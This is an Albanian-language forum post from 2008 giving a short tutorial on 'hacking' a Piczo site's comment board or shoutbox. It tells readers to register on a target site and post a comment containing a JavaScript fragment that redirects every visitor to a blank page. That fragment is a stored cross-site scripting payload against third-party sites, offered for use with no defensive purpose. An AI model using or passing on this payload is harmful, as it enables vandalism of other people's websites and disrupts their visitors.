WelCome

WelCome
 
ForumGalleryPortalli**Regjistrohuidentifikimi

Share | 
 

 Piczo hack ShoutBox

Shko poshtė 
AutoriMesazh
Admin
Administrator
Administrator
avatar

Numri i postimeve : 290
Age : 25
Location : Europe
Registration date : 11/11/2007

MesazhTitulli: Piczo hack ShoutBox   Wed Dec 17, 2008 9:24 pm

Edhe pse piczo eshte ne nje nivel qe nuk perdoret shume nga ata qe kan njohuri mirepo shume ka qe nuk kan njohuri rreth kompjuterizmit dhe e perdorin piczon si gje te thjeshte

Po boj nji tuto shume te thjeshte se si me ja hek comment board komplet prej webit

Shkojm ne site , nqs e ka commetn board ne index shkojm atehere aty add a message pastaj na kekron me u regjistru , regjistrohemi pastaj tek komenti e vendosim kete

type="text/javascript">document.location.href='about:blank'
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://zihnimagani.albanianforum.net
 
Piczo hack ShoutBox
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
WelCome :: Programe & Informatika :: Programe Free :: Programe-
Kėrce tek: